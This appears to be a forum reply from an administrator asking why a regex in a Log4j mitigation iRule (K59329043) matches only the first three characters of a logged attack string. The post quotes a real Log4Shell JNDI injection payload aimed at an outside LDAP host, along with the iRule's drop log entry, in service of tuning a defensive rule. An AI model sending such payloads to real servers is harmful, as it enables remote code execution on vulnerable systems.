Log4j iRule mitigation as described in K59329043 - which encoding is the regex using?
Hi @Daniel Wolf ,
thank you for your quick reply. Well, I already actually tried to get my answer via regex101.com.
Here is what somehow surprises me:
if I type in this string
/${jndi:ldap:/55.55.55.55:1389/Exploit}
which I extracted from a real attack / exploit attempt against one of our production servers:
info tmm[13241]: Rule /Linux/LOG4J-iRULE-BLOCK <HTTP_REQUEST>: log4j_rce_detection drop on URI: /${jndi:ldap:/55.55.55.55:1389/Exploit}
I only get a match on the first 3 characters:
Is it meant to be so? Or am I missing something here?
Thank you for clarifying.
Best Regards